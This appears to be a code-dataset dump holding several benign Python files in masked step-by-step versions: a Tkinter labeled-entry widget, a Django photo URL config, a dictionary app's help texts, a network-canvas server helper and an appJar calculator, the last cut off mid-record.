\"\"\"Set the configuration of the megawidget\"\"\"\n entry = options['entry']\n keys = [*kwargs.keys()]\n for k in keys:\n if k in entry:\n v = kwargs.pop(k)\n self.entry.config(**{entry[k]: v})\n super().config(**kwargs)\n", "step-3": "<mask token>\n\n\nclass LabeledEntry(sw.LabeledWidget):\n\n def __init__(self, parent, 
*args, **kwargs):\n \"\"\"Initialize the instance\"\"\"\n class_ = kwargs.pop('class_', 'MLabeledEntry')\n super().__init__(parent, class_=class_)\n interior = self.interior\n justify = kwargs.pop('justify', tk.LEFT)\n entrywidth = kwargs.pop('width', 15)\n self.entry = ttk.Entry(interior, justify=justify, width=entrywidth)\n self.entry.grid(row=0, column=0, sticky=tk.EW)\n self.interior = ttk.Frame(interior)\n self.interior.grid(row=0, column=1, sticky=tk.NSEW)\n interior.columnconfigure(0, weight=1)\n self.config(**kwargs)\n\n @property\n def value(self):\n return self.get()\n\n @value.setter\n def value(self, value):\n self.set(value)\n\n def show(self, *args):\n \"\"\"Show only the specified subwidgets.\n 'all' or no arguments reverts to showing all\"\"\"\n super().show(*args)\n show_all = len(args) == 0 or args[0] == 'all'\n if show_all or 'entry' in args:\n self.entry.grid(row=0, column=0, sticky=tk.EW)\n else:\n self.entry.grid_forget()\n\n def set(self, value):\n \"\"\"Set the value of the entry widget\"\"\"\n self.entry.delete(0, tk.END)\n if value is None:\n return\n self.entry.insert(0, value)\n\n def get(self):\n \"\"\"return the current value\"\"\"\n value = self.entry.get()\n return value\n\n def config(self, **kwargs):\n \"\"\"Set the configuration of the megawidget\"\"\"\n entry = options['entry']\n keys = [*kwargs.keys()]\n for k in keys:\n if k in entry:\n v = kwargs.pop(k)\n self.entry.config(**{entry[k]: v})\n super().config(**kwargs)\n", "step-4": "<mask token>\nlogger = logging.getLogger(__name__)\noptions = {'entry': {'class_': 'class_', 'cursor': 'cursor',\n 'exportselection': 'exportselection', 'font': 'font', 'invalidcommand':\n 'invalidcommand', 'justify': 'justify', 'show': 'show', 'style':\n 'style', 'takefocus': 'takefocus', 'variable': 'textvariable',\n 'validate': 'validate', 'validatecommand': 'validatecommand', 'width':\n 'width', 'xscrollcommand': 'xscrollcommand'}}\n\n\nclass LabeledEntry(sw.LabeledWidget):\n\n def __init__(self, 
parent, *args, **kwargs):\n \"\"\"Initialize the instance\"\"\"\n class_ = kwargs.pop('class_', 'MLabeledEntry')\n super().__init__(parent, class_=class_)\n interior = self.interior\n justify = kwargs.pop('justify', tk.LEFT)\n entrywidth = kwargs.pop('width', 15)\n self.entry = ttk.Entry(interior, justify=justify, width=entrywidth)\n self.entry.grid(row=0, column=0, sticky=tk.EW)\n self.interior = ttk.Frame(interior)\n self.interior.grid(row=0, column=1, sticky=tk.NSEW)\n interior.columnconfigure(0, weight=1)\n self.config(**kwargs)\n\n @property\n def value(self):\n return self.get()\n\n @value.setter\n def value(self, value):\n self.set(value)\n\n def show(self, *args):\n \"\"\"Show only the specified subwidgets.\n 'all' or no arguments reverts to showing all\"\"\"\n super().show(*args)\n show_all = len(args) == 0 or args[0] == 'all'\n if show_all or 'entry' in args:\n self.entry.grid(row=0, column=0, sticky=tk.EW)\n else:\n self.entry.grid_forget()\n\n def set(self, value):\n \"\"\"Set the value of the entry widget\"\"\"\n self.entry.delete(0, tk.END)\n if value is None:\n return\n self.entry.insert(0, value)\n\n def get(self):\n \"\"\"return the current value\"\"\"\n value = self.entry.get()\n return value\n\n def config(self, **kwargs):\n \"\"\"Set the configuration of the megawidget\"\"\"\n entry = options['entry']\n keys = [*kwargs.keys()]\n for k in keys:\n if k in entry:\n v = kwargs.pop(k)\n self.entry.config(**{entry[k]: v})\n super().config(**kwargs)\n", "step-5": "# -*- coding: utf-8 -*-\n\n\"\"\"Labeled entry widget.\n\nThe goal of these widgets is twofold: to make it easier for developers\nto implement dialogs with compound widgets, and to naturally\nstandardize the user interface presented to the user.\n\"\"\"\n\nimport logging\nimport seamm_widgets as sw\nimport tkinter as tk\nimport tkinter.ttk as ttk\n\nlogger = logging.getLogger(__name__)\n\noptions = {\n \"entry\": {\n \"class_\": \"class_\",\n \"cursor\": \"cursor\",\n \"exportselection\": 
\"exportselection\",\n \"font\": \"font\",\n \"invalidcommand\": \"invalidcommand\",\n \"justify\": \"justify\",\n \"show\": \"show\",\n \"style\": \"style\",\n \"takefocus\": \"takefocus\",\n \"variable\": \"textvariable\",\n \"validate\": \"validate\",\n \"validatecommand\": \"validatecommand\",\n \"width\": \"width\",\n \"xscrollcommand\": \"xscrollcommand\",\n },\n}\n\n\nclass LabeledEntry(sw.LabeledWidget):\n def __init__(self, parent, *args, **kwargs):\n \"\"\"Initialize the instance\"\"\"\n class_ = kwargs.pop(\"class_\", \"MLabeledEntry\")\n super().__init__(parent, class_=class_)\n\n interior = self.interior\n\n # entry\n justify = kwargs.pop(\"justify\", tk.LEFT)\n entrywidth = kwargs.pop(\"width\", 15)\n\n self.entry = ttk.Entry(interior, justify=justify, width=entrywidth)\n self.entry.grid(row=0, column=0, sticky=tk.EW)\n\n # interior frame\n self.interior = ttk.Frame(interior)\n self.interior.grid(row=0, column=1, sticky=tk.NSEW)\n\n interior.columnconfigure(0, weight=1)\n\n self.config(**kwargs)\n\n @property\n def value(self):\n return self.get()\n\n @value.setter\n def value(self, value):\n self.set(value)\n\n def show(self, *args):\n \"\"\"Show only the specified subwidgets.\n 'all' or no arguments reverts to showing all\"\"\"\n\n super().show(*args)\n\n show_all = len(args) == 0 or args[0] == \"all\"\n\n if show_all or \"entry\" in args:\n self.entry.grid(row=0, column=0, sticky=tk.EW)\n else:\n self.entry.grid_forget()\n\n def set(self, value):\n \"\"\"Set the value of the entry widget\"\"\"\n\n self.entry.delete(0, tk.END)\n if value is None:\n return\n\n self.entry.insert(0, value)\n\n def get(self):\n \"\"\"return the current value\"\"\"\n value = self.entry.get()\n return value\n\n def config(self, **kwargs):\n \"\"\"Set the configuration of the megawidget\"\"\"\n\n # our options that we deal with\n entry = options[\"entry\"]\n\n # cannot modify kwargs while iterating over it...\n keys = [*kwargs.keys()]\n for k in keys:\n if k in entry:\n v 
= kwargs.pop(k)\n self.entry.config(**{entry[k]: v})\n\n # having removed our options, pass rest to parent\n super().config(**kwargs)\n", "step-ids": [ 5, 6, 8, 9, 11 ] }
[ 5, 6, 8, 9, 11 ]
from django.urls import path from photo.api.views import api_photo_detail_view, api_photos_view urlpatterns = [path('<int:id>', api_photo_detail_view, name='user_detail'), path('', api_photos_view, name='users')]
normal
{ "blob_id": "ab4145ccc0b360dcca9b9aa6ebe919bdddac65a2", "index": 3962, "step-1": "<mask token>\n", "step-2": "<mask token>\nurlpatterns = [path('<int:id>', api_photo_detail_view, name='user_detail'),\n path('', api_photos_view, name='users')]\n", "step-3": "from django.urls import path\nfrom photo.api.views import api_photo_detail_view, api_photos_view\nurlpatterns = [path('<int:id>', api_photo_detail_view, name='user_detail'),\n path('', api_photos_view, name='users')]\n", "step-4": null, "step-5": null, "step-ids": [ 0, 1, 2 ] }
[ 0, 1, 2 ]
#!/usr/bin/env python # -*- coding: utf-8 -*- help_txt = """ :help, show this help menu. :help [command] for detail :dict [word], only find translation on dict.cn :google [sentence], only find translation on google api :lan2lan [sentence], translate from one language to another language :add [word], add new word to your library :del [word], delete word from your library :list [number], list words in your library :rating [number], lsit words in your library with a certain rate :history [number], show your search history :clear, clear your oldest 100 history for more information, browser http://mardict.appspot.com """ help_dict = """ help on dict: [usage] :dict word [intro] translate your word only use dict.cn api [eg] :dict hello more on http://mardict.appspot.com/help/#dict """ help_google = """ help on google: [usage] :google word [intro] translate your word only use google api [eg] :google google is a bitch more on http://mardict.appspot.com/help/#google """ help_lan2lan = """ help on lan2lan: [usage] :lan2lan word [intro] translate from one language to another language by google translation api [eg] :en2zh hello more on http://mardict.appspot.com/help/#lan2lan """ help_history = """ help on history: [usage] :history (number) [intro] list your search history [eg] :history 9 more on http://mardict.appspot.com/help/#history """ help_clear = """ help on clear: [usage] :clear [intro] clear your search history more on http://mardict.appspot.com/help/#clear """ help_add = """ help on add: [usage] :add (word) [intro] add the new word to your library(storing your unfamiliar word) [eg] :add hello more on http://mardict.appspot.com/help/#add """ help_del = """ help on del: [usage] :del word [intro] delete the word from your library [eg] :del hello more on http://mardict.appspot.com/help/#del """ help_list = """ help on list: [usage] :list (number) [intro] list a certain number of words from your library. [eg] :list 9 this function is very complex, browser the website. 
more on http://mardict.appspot.com/help/#list """ help_rating = """ help on rating: [usage] :rating (number) [intro] list a certain number of words from your library with a certain rate. [eg] :rating 0 9 this function is very complex, browser the website. more on http://mardict.appspot.com/help/#rating """
normal
{ "blob_id": "3fadb91bd2367819a540f687530f4b48ed878423", "index": 9149, "step-1": "<mask token>\n", "step-2": "help_txt = \"\"\"\n:help, show this help menu. :help [command] for detail\n:dict [word], only find translation on dict.cn\n:google [sentence], only find translation on google api\n:lan2lan [sentence], translate from one language to another language\n:add [word], add new word to your library\n:del [word], delete word from your library\n:list [number], list words in your library\n:rating [number], lsit words in your library with a certain rate\n:history [number], show your search history\n:clear, clear your oldest 100 history\n\nfor more information, browser http://mardict.appspot.com\n\"\"\"\nhelp_dict = \"\"\"\nhelp on dict:\n[usage] :dict word\n[intro] translate your word only use dict.cn api\n[eg] :dict hello\n\nmore on http://mardict.appspot.com/help/#dict\n\"\"\"\nhelp_google = \"\"\"\nhelp on google:\n[usage] :google word\n[intro] translate your word only use google api\n[eg] :google google is a bitch\n\nmore on http://mardict.appspot.com/help/#google\n\"\"\"\nhelp_lan2lan = \"\"\"\nhelp on lan2lan:\n[usage] :lan2lan word\n[intro] translate from one language to another language by google translation api\n[eg] :en2zh hello\n\nmore on http://mardict.appspot.com/help/#lan2lan\n\"\"\"\nhelp_history = \"\"\"\nhelp on history:\n[usage] :history (number)\n[intro] list your search history\n[eg] :history 9\n\nmore on http://mardict.appspot.com/help/#history\n\"\"\"\nhelp_clear = \"\"\"\nhelp on clear:\n[usage] :clear\n[intro] clear your search history\n\nmore on http://mardict.appspot.com/help/#clear\n\"\"\"\nhelp_add = \"\"\"\nhelp on add:\n[usage] :add (word)\n[intro] add the new word to your library(storing your unfamiliar word)\n[eg] :add hello\n\nmore on http://mardict.appspot.com/help/#add\n\"\"\"\nhelp_del = \"\"\"\nhelp on del:\n[usage] :del word\n[intro] delete the word from your library\n[eg] :del hello\n\nmore on 
http://mardict.appspot.com/help/#del\n\"\"\"\nhelp_list = \"\"\"\nhelp on list:\n[usage] :list (number)\n[intro] list a certain number of words from your library.\n[eg] :list 9\n\nthis function is very complex, browser the website.\n\nmore on http://mardict.appspot.com/help/#list\n\"\"\"\nhelp_rating = \"\"\"\nhelp on rating:\n[usage] :rating (number)\n[intro] list a certain number of words from your library with a certain rate.\n[eg] :rating 0 9\n\nthis function is very complex, browser the website.\n\nmore on http://mardict.appspot.com/help/#rating\n\"\"\"\n", "step-3": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nhelp_txt = \"\"\"\n:help, show this help menu. :help [command] for detail\n:dict [word], only find translation on dict.cn\n:google [sentence], only find translation on google api\n:lan2lan [sentence], translate from one language to another language\n:add [word], add new word to your library\n:del [word], delete word from your library\n:list [number], list words in your library\n:rating [number], lsit words in your library with a certain rate\n:history [number], show your search history\n:clear, clear your oldest 100 history\n\nfor more information, browser http://mardict.appspot.com\n\"\"\"\n\nhelp_dict = \"\"\"\nhelp on dict:\n[usage] :dict word\n[intro] translate your word only use dict.cn api\n[eg] :dict hello\n\nmore on http://mardict.appspot.com/help/#dict\n\"\"\"\n\nhelp_google = \"\"\"\nhelp on google:\n[usage] :google word\n[intro] translate your word only use google api\n[eg] :google google is a bitch\n\nmore on http://mardict.appspot.com/help/#google\n\"\"\"\n\nhelp_lan2lan = \"\"\"\nhelp on lan2lan:\n[usage] :lan2lan word\n[intro] translate from one language to another language by google translation api\n[eg] :en2zh hello\n\nmore on http://mardict.appspot.com/help/#lan2lan\n\"\"\"\n\nhelp_history = \"\"\"\nhelp on history:\n[usage] :history (number)\n[intro] list your search history\n[eg] :history 9\n\nmore on 
http://mardict.appspot.com/help/#history\n\"\"\"\n\nhelp_clear = \"\"\"\nhelp on clear:\n[usage] :clear\n[intro] clear your search history\n\nmore on http://mardict.appspot.com/help/#clear\n\"\"\"\n\nhelp_add = \"\"\"\nhelp on add:\n[usage] :add (word)\n[intro] add the new word to your library(storing your unfamiliar word)\n[eg] :add hello\n\nmore on http://mardict.appspot.com/help/#add\n\"\"\"\n\nhelp_del = \"\"\"\nhelp on del:\n[usage] :del word\n[intro] delete the word from your library\n[eg] :del hello\n\nmore on http://mardict.appspot.com/help/#del\n\"\"\"\n\nhelp_list = \"\"\"\nhelp on list:\n[usage] :list (number)\n[intro] list a certain number of words from your library.\n[eg] :list 9\n\nthis function is very complex, browser the website.\n\nmore on http://mardict.appspot.com/help/#list\n\"\"\"\n\nhelp_rating = \"\"\"\nhelp on rating:\n[usage] :rating (number)\n[intro] list a certain number of words from your library with a certain rate.\n[eg] :rating 0 9\n\nthis function is very complex, browser the website.\n\nmore on http://mardict.appspot.com/help/#rating\n\"\"\"\n", "step-4": null, "step-5": null, "step-ids": [ 0, 1, 2 ] }
[ 0, 1, 2 ]
<|reserved_special_token_0|> def http_server(file: str=None, host: str='localhost', port: int=5050 ) ->CanvasServer: """Creates a new HTTP server for displaying the network, using WebSockets to transmit data. The server will only start once its :meth:`~server.CanvasServer.start` method is called. After the server has started, the network can be viewed by opening a browser and navigating to the address ``http://localhost:5050/`` (change the port as necessary). :file: (Optional) The path to the HTML file which the server should display, relative to the current runtime directory. If unspecified, the default HTML file will be used. When creating a custom HTML interface, use the default file as a guide. :type file: str :port: (Optional) The port on which the server should start, defaulting to to 5050. Note that the next port (by default 5051) will also be used to transmit data through WebSockets. :type port: int """ return CanvasServer(file, host, port) <|reserved_special_token_0|> <|reserved_special_token_1|> <|reserved_special_token_0|> def http_server(file: str=None, host: str='localhost', port: int=5050 ) ->CanvasServer: """Creates a new HTTP server for displaying the network, using WebSockets to transmit data. The server will only start once its :meth:`~server.CanvasServer.start` method is called. After the server has started, the network can be viewed by opening a browser and navigating to the address ``http://localhost:5050/`` (change the port as necessary). :file: (Optional) The path to the HTML file which the server should display, relative to the current runtime directory. If unspecified, the default HTML file will be used. When creating a custom HTML interface, use the default file as a guide. :type file: str :port: (Optional) The port on which the server should start, defaulting to to 5050. Note that the next port (by default 5051) will also be used to transmit data through WebSockets. 
:type port: int """ return CanvasServer(file, host, port) def jupyter_canvas(buttons: bool=False) ->JupyterCanvas: """Creates a new :class:`~api.Canvas` which will dispatch and receive events through a Jupyter widget, and which can be displayed using the IPython ``display`` function. By default, the canvas size is (400, 250), and requires the ``ctrl``/``cmd`` to be held down while zooming.""" if HAS_JUPYTER: return create_jupyter_canvas(buttons=buttons) else: raise Exception('Jupyter is not installed') <|reserved_special_token_1|> <|reserved_special_token_0|> try: from .jupyter import JupyterCanvas, create_jupyter_canvas HAS_JUPYTER = True except: HAS_JUPYTER = False JupyterCanvas = None def http_server(file: str=None, host: str='localhost', port: int=5050 ) ->CanvasServer: """Creates a new HTTP server for displaying the network, using WebSockets to transmit data. The server will only start once its :meth:`~server.CanvasServer.start` method is called. After the server has started, the network can be viewed by opening a browser and navigating to the address ``http://localhost:5050/`` (change the port as necessary). :file: (Optional) The path to the HTML file which the server should display, relative to the current runtime directory. If unspecified, the default HTML file will be used. When creating a custom HTML interface, use the default file as a guide. :type file: str :port: (Optional) The port on which the server should start, defaulting to to 5050. Note that the next port (by default 5051) will also be used to transmit data through WebSockets. :type port: int """ return CanvasServer(file, host, port) def jupyter_canvas(buttons: bool=False) ->JupyterCanvas: """Creates a new :class:`~api.Canvas` which will dispatch and receive events through a Jupyter widget, and which can be displayed using the IPython ``display`` function. 
By default, the canvas size is (400, 250), and requires the ``ctrl``/``cmd`` to be held down while zooming.""" if HAS_JUPYTER: return create_jupyter_canvas(buttons=buttons) else: raise Exception('Jupyter is not installed') <|reserved_special_token_1|> from .server import CanvasServer try: from .jupyter import JupyterCanvas, create_jupyter_canvas HAS_JUPYTER = True except: HAS_JUPYTER = False JupyterCanvas = None def http_server(file: str=None, host: str='localhost', port: int=5050 ) ->CanvasServer: """Creates a new HTTP server for displaying the network, using WebSockets to transmit data. The server will only start once its :meth:`~server.CanvasServer.start` method is called. After the server has started, the network can be viewed by opening a browser and navigating to the address ``http://localhost:5050/`` (change the port as necessary). :file: (Optional) The path to the HTML file which the server should display, relative to the current runtime directory. If unspecified, the default HTML file will be used. When creating a custom HTML interface, use the default file as a guide. :type file: str :port: (Optional) The port on which the server should start, defaulting to to 5050. Note that the next port (by default 5051) will also be used to transmit data through WebSockets. :type port: int """ return CanvasServer(file, host, port) def jupyter_canvas(buttons: bool=False) ->JupyterCanvas: """Creates a new :class:`~api.Canvas` which will dispatch and receive events through a Jupyter widget, and which can be displayed using the IPython ``display`` function. 
By default, the canvas size is (400, 250), and requires the ``ctrl``/``cmd`` to be held down while zooming.""" if HAS_JUPYTER: return create_jupyter_canvas(buttons=buttons) else: raise Exception('Jupyter is not installed') <|reserved_special_token_1|> from .server import CanvasServer try: from .jupyter import JupyterCanvas, create_jupyter_canvas HAS_JUPYTER = True except: HAS_JUPYTER = False JupyterCanvas = None # type: ignore def http_server( file: str = None, host: str = "localhost", port: int = 5050 ) -> CanvasServer: """Creates a new HTTP server for displaying the network, using WebSockets to transmit data. The server will only start once its :meth:`~server.CanvasServer.start` method is called. After the server has started, the network can be viewed by opening a browser and navigating to the address ``http://localhost:5050/`` (change the port as necessary). :file: (Optional) The path to the HTML file which the server should display, relative to the current runtime directory. If unspecified, the default HTML file will be used. When creating a custom HTML interface, use the default file as a guide. :type file: str :port: (Optional) The port on which the server should start, defaulting to to 5050. Note that the next port (by default 5051) will also be used to transmit data through WebSockets. :type port: int """ return CanvasServer(file, host, port) def jupyter_canvas(buttons: bool = False) -> JupyterCanvas: """Creates a new :class:`~api.Canvas` which will dispatch and receive events through a Jupyter widget, and which can be displayed using the IPython ``display`` function. By default, the canvas size is (400, 250), and requires the ``ctrl``/``cmd`` to be held down while zooming.""" if HAS_JUPYTER: return create_jupyter_canvas(buttons=buttons) else: raise Exception("Jupyter is not installed")
flexible
{ "blob_id": "b11e2837d3ba9c14770b8039186a2175adc41ea1", "index": 283, "step-1": "<mask token>\n\n\ndef http_server(file: str=None, host: str='localhost', port: int=5050\n ) ->CanvasServer:\n \"\"\"Creates a new HTTP server for displaying the network, using WebSockets to\n transmit data. The server will only start once its\n :meth:`~server.CanvasServer.start` method is called. After the server has started,\n the network can be viewed by opening a browser and navigating to the address\n ``http://localhost:5050/`` (change the port as necessary).\n\n :file: (Optional) The path to the HTML file which the server should display,\n relative to the current runtime directory. If unspecified, the default HTML file\n will be used. When creating a custom HTML interface, use the default file as a\n guide.\n :type file: str\n\n :port: (Optional) The port on which the server should start, defaulting to to 5050.\n Note that the next port (by default 5051) will also be used to transmit data\n through WebSockets.\n :type port: int\n \"\"\"\n return CanvasServer(file, host, port)\n\n\n<mask token>\n", "step-2": "<mask token>\n\n\ndef http_server(file: str=None, host: str='localhost', port: int=5050\n ) ->CanvasServer:\n \"\"\"Creates a new HTTP server for displaying the network, using WebSockets to\n transmit data. The server will only start once its\n :meth:`~server.CanvasServer.start` method is called. After the server has started,\n the network can be viewed by opening a browser and navigating to the address\n ``http://localhost:5050/`` (change the port as necessary).\n\n :file: (Optional) The path to the HTML file which the server should display,\n relative to the current runtime directory. If unspecified, the default HTML file\n will be used. 
When creating a custom HTML interface, use the default file as a\n guide.\n :type file: str\n\n :port: (Optional) The port on which the server should start, defaulting to to 5050.\n Note that the next port (by default 5051) will also be used to transmit data\n through WebSockets.\n :type port: int\n \"\"\"\n return CanvasServer(file, host, port)\n\n\ndef jupyter_canvas(buttons: bool=False) ->JupyterCanvas:\n \"\"\"Creates a new :class:`~api.Canvas` which will dispatch and receive\n events through a Jupyter widget, and which can be displayed using the IPython\n ``display`` function.\n\n By default, the canvas size is (400, 250), and requires the ``ctrl``/``cmd`` to be\n held down while zooming.\"\"\"\n if HAS_JUPYTER:\n return create_jupyter_canvas(buttons=buttons)\n else:\n raise Exception('Jupyter is not installed')\n", "step-3": "<mask token>\ntry:\n from .jupyter import JupyterCanvas, create_jupyter_canvas\n HAS_JUPYTER = True\nexcept:\n HAS_JUPYTER = False\n JupyterCanvas = None\n\n\ndef http_server(file: str=None, host: str='localhost', port: int=5050\n ) ->CanvasServer:\n \"\"\"Creates a new HTTP server for displaying the network, using WebSockets to\n transmit data. The server will only start once its\n :meth:`~server.CanvasServer.start` method is called. After the server has started,\n the network can be viewed by opening a browser and navigating to the address\n ``http://localhost:5050/`` (change the port as necessary).\n\n :file: (Optional) The path to the HTML file which the server should display,\n relative to the current runtime directory. If unspecified, the default HTML file\n will be used. 
When creating a custom HTML interface, use the default file as a\n guide.\n :type file: str\n\n :port: (Optional) The port on which the server should start, defaulting to to 5050.\n Note that the next port (by default 5051) will also be used to transmit data\n through WebSockets.\n :type port: int\n \"\"\"\n return CanvasServer(file, host, port)\n\n\ndef jupyter_canvas(buttons: bool=False) ->JupyterCanvas:\n \"\"\"Creates a new :class:`~api.Canvas` which will dispatch and receive\n events through a Jupyter widget, and which can be displayed using the IPython\n ``display`` function.\n\n By default, the canvas size is (400, 250), and requires the ``ctrl``/``cmd`` to be\n held down while zooming.\"\"\"\n if HAS_JUPYTER:\n return create_jupyter_canvas(buttons=buttons)\n else:\n raise Exception('Jupyter is not installed')\n", "step-4": "from .server import CanvasServer\ntry:\n from .jupyter import JupyterCanvas, create_jupyter_canvas\n HAS_JUPYTER = True\nexcept:\n HAS_JUPYTER = False\n JupyterCanvas = None\n\n\ndef http_server(file: str=None, host: str='localhost', port: int=5050\n ) ->CanvasServer:\n \"\"\"Creates a new HTTP server for displaying the network, using WebSockets to\n transmit data. The server will only start once its\n :meth:`~server.CanvasServer.start` method is called. After the server has started,\n the network can be viewed by opening a browser and navigating to the address\n ``http://localhost:5050/`` (change the port as necessary).\n\n :file: (Optional) The path to the HTML file which the server should display,\n relative to the current runtime directory. If unspecified, the default HTML file\n will be used. 
When creating a custom HTML interface, use the default file as a\n guide.\n :type file: str\n\n :port: (Optional) The port on which the server should start, defaulting to to 5050.\n Note that the next port (by default 5051) will also be used to transmit data\n through WebSockets.\n :type port: int\n \"\"\"\n return CanvasServer(file, host, port)\n\n\ndef jupyter_canvas(buttons: bool=False) ->JupyterCanvas:\n \"\"\"Creates a new :class:`~api.Canvas` which will dispatch and receive\n events through a Jupyter widget, and which can be displayed using the IPython\n ``display`` function.\n\n By default, the canvas size is (400, 250), and requires the ``ctrl``/``cmd`` to be\n held down while zooming.\"\"\"\n if HAS_JUPYTER:\n return create_jupyter_canvas(buttons=buttons)\n else:\n raise Exception('Jupyter is not installed')\n", "step-5": "from .server import CanvasServer\n\ntry:\n from .jupyter import JupyterCanvas, create_jupyter_canvas\n\n HAS_JUPYTER = True\nexcept:\n HAS_JUPYTER = False\n JupyterCanvas = None # type: ignore\n\n\ndef http_server(\n file: str = None, host: str = \"localhost\", port: int = 5050\n) -> CanvasServer:\n \"\"\"Creates a new HTTP server for displaying the network, using WebSockets to\n transmit data. The server will only start once its\n :meth:`~server.CanvasServer.start` method is called. After the server has started,\n the network can be viewed by opening a browser and navigating to the address\n ``http://localhost:5050/`` (change the port as necessary).\n\n :file: (Optional) The path to the HTML file which the server should display,\n relative to the current runtime directory. If unspecified, the default HTML file\n will be used. 
When creating a custom HTML interface, use the default file as a\n guide.\n :type file: str\n\n :port: (Optional) The port on which the server should start, defaulting to to 5050.\n Note that the next port (by default 5051) will also be used to transmit data\n through WebSockets.\n :type port: int\n \"\"\"\n return CanvasServer(file, host, port)\n\n\ndef jupyter_canvas(buttons: bool = False) -> JupyterCanvas:\n \"\"\"Creates a new :class:`~api.Canvas` which will dispatch and receive\n events through a Jupyter widget, and which can be displayed using the IPython\n ``display`` function.\n\n By default, the canvas size is (400, 250), and requires the ``ctrl``/``cmd`` to be\n held down while zooming.\"\"\"\n if HAS_JUPYTER:\n return create_jupyter_canvas(buttons=buttons)\n else:\n raise Exception(\"Jupyter is not installed\")\n", "step-ids": [ 1, 2, 3, 4, 5 ] }
[ 1, 2, 3, 4, 5 ]
from appJar import gui app = gui("Calculator", "560x240") ### FUNCTIONS ### n1, n2 = 0.0, 0.0 result = 0.0 isFirst = True calc = "" def doMath(btn): global result, n1, n2, isFirst, calc inputNumber() if(btn == "Add"): calc = "a" if(btn == "Substract"): calc = "s" if(btn == "Multiply"): calc = "m" if(btn == "Divide"): calc = "d" app.clearEntry("Number") def calculate(btn): global result, n1, n2, isFirst, calc inputNumber() if(calc == 'a'): result = n1 + n2 if(calc == 's'): result = n1 - n2 if(calc == 'm'): result = n1 * n2 if(calc == 'd'): try: result = n1 / n2 except ZeroDivisionError: clearOut(btn) app.errorBox("DivisionByZero", "You can't divide by Zero.") app.clearEntry("Number") app.setLabel("Result", result) def clearOut(btn): global result, n1, n2, isFirst, calc n1, n2 = 0.0, 0.0 result = 0.0 isFirst = True calc = "" def inputNumber(): global n1, n2, isFirst if(isFirst): n1 = app.getEntry("Number") isFirst = False else: n2 = app.getEntry("Number") isFirst = True ### FUNCTIONS ### app.setStretch("column") app.setSticky("") app.setResizable(True) app.addNumericEntry("Number") app.setEntryDefault("Number", "Enter Number") app.addButtons(["Add", "Substract", "Multiply", "Divide"], doMath) app.addButtons(["Calculate!", "clearOut"], [calculate, clearOut]) app.setButton("clearOut", "C") app.addEmptyLabel("Result") app.go()
normal
{ "blob_id": "084299da1c2f41de96e60d37088466c7b61de38e", "index": 9750, "step-1": "<mask token>\n\n\ndef doMath(btn):\n global result, n1, n2, isFirst, calc\n inputNumber()\n if btn == 'Add':\n calc = 'a'\n if btn == 'Substract':\n calc = 's'\n if btn == 'Multiply':\n calc = 'm'\n if btn == 'Divide':\n calc = 'd'\n app.clearEntry('Number')\n\n\ndef calculate(btn):\n global result, n1, n2, isFirst, calc\n inputNumber()\n if calc == 'a':\n result = n1 + n2\n if calc == 's':\n result = n1 - n2\n if calc == 'm':\n result = n1 * n2\n if calc == 'd':\n try:\n result = n1 / n2\n except ZeroDivisionError:\n clearOut(btn)\n app.errorBox('DivisionByZero', \"You can't divide by Zero.\")\n app.clearEntry('Number')\n app.setLabel('Result', result)\n\n\ndef clearOut(btn):\n global result, n1, n2, isFirst, calc\n n1, n2 = 0.0, 0.0\n result = 0.0\n isFirst = True\n calc = ''\n\n\n<mask token>\n", "step-2": "<mask token>\n\n\ndef doMath(btn):\n global result, n1, n2, isFirst, calc\n inputNumber()\n if btn == 'Add':\n calc = 'a'\n if btn == 'Substract':\n calc = 's'\n if btn == 'Multiply':\n calc = 'm'\n if btn == 'Divide':\n calc = 'd'\n app.clearEntry('Number')\n\n\ndef calculate(btn):\n global result, n1, n2, isFirst, calc\n inputNumber()\n if calc == 'a':\n result = n1 + n2\n if calc == 's':\n result = n1 - n2\n if calc == 'm':\n result = n1 * n2\n if calc == 'd':\n try:\n result = n1 / n2\n except ZeroDivisionError:\n clearOut(btn)\n app.errorBox('DivisionByZero', \"You can't divide by Zero.\")\n app.clearEntry('Number')\n app.setLabel('Result', result)\n\n\ndef clearOut(btn):\n global result, n1, n2, isFirst, calc\n n1, n2 = 0.0, 0.0\n result = 0.0\n isFirst = True\n calc = ''\n\n\ndef inputNumber():\n global n1, n2, isFirst\n if isFirst:\n n1 = app.getEntry('Number')\n isFirst = False\n else:\n n2 = app.getEntry('Number')\n isFirst = True\n\n\napp.setStretch('column')\napp.setSticky('')\napp.setResizable(True)\napp.addNumericEntry('Number')\napp.setEntryDefault('Number', 
'Enter Number')\napp.addButtons(['Add', 'Substract', 'Multiply', 'Divide'], doMath)\napp.addButtons(['Calculate!', 'clearOut'], [calculate, clearOut])\napp.setButton('clearOut', 'C')\napp.addEmptyLabel('Result')\napp.go()\n", "step-3": "<mask token>\napp = gui('Calculator', '560x240')\nn1, n2 = 0.0, 0.0\nresult = 0.0\nisFirst = True\ncalc = ''\n\n\ndef doMath(btn):\n global result, n1, n2, isFirst, calc\n inputNumber()\n if btn == 'Add':\n calc = 'a'\n if btn == 'Substract':\n calc = 's'\n if btn == 'Multiply':\n calc = 'm'\n if btn == 'Divide':\n calc = 'd'\n app.clearEntry('Number')\n\n\ndef calculate(btn):\n global result, n1, n2, isFirst, calc\n inputNumber()\n if calc == 'a':\n result = n1 + n2\n if calc == 's':\n result = n1 - n2\n if calc == 'm':\n result = n1 * n2\n if calc == 'd':\n try:\n result = n1 / n2\n except ZeroDivisionError:\n clearOut(btn)\n app.errorBox('DivisionByZero', \"You can't divide by Zero.\")\n app.clearEntry('Number')\n app.setLabel('Result', result)\n\n\ndef clearOut(btn):\n global result, n1, n2, isFirst, calc\n n1, n2 = 0.0, 0.0\n result = 0.0\n isFirst = True\n calc = ''\n\n\ndef inputNumber():\n global n1, n2, isFirst\n if isFirst:\n n1 = app.getEntry('Number')\n isFirst = False\n else:\n n2 = app.getEntry('Number')\n isFirst = True\n\n\napp.setStretch('column')\napp.setSticky('')\napp.setResizable(True)\napp.addNumericEntry('Number')\napp.setEntryDefault('Number', 'Enter Number')\napp.addButtons(['Add', 'Substract', 'Multiply', 'Divide'], doMath)\napp.addButtons(['Calculate!', 'clearOut'], [calculate, clearOut])\napp.setButton('clearOut', 'C')\napp.addEmptyLabel('Result')\napp.go()\n", "step-4": "from appJar import gui\napp = gui('Calculator', '560x240')\nn1, n2 = 0.0, 0.0\nresult = 0.0\nisFirst = True\ncalc = ''\n\n\ndef doMath(btn):\n global result, n1, n2, isFirst, calc\n inputNumber()\n if btn == 'Add':\n calc = 'a'\n if btn == 'Substract':\n calc = 's'\n if 